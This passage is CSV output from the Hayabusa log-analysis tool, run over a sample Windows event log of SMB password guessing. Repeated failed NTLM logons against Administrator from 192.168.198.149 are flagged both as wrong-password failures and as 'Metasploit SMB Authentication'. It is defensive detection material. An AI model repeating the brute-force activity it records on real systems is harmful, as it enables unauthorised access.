NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
